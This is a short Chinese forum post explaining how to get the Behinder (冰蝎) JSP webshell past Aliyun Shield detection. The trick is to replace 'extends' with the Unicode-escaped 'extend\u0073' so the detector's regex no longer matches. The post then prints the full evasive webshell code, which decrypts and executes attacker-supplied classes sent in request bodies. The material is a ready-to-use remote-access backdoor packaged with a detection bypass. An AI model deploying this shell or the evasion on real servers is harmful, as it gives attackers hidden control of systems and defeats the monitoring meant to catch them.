更改一个字符绕过阿里云盾检测冰蝎jsp版webshell

adminsb 2月前 110

最新回复 (1)
  • adminsb 2月前
    0 引用 2
    稍微研究了下,定位到正则表达式匹配的是
    extends ClassLoader

    “所以只需要更改原来的一个字符s,将
    extends ClassLoader

    替换成
    extend\u0073 ClassLoader

    "

    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extend\u0073 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
返回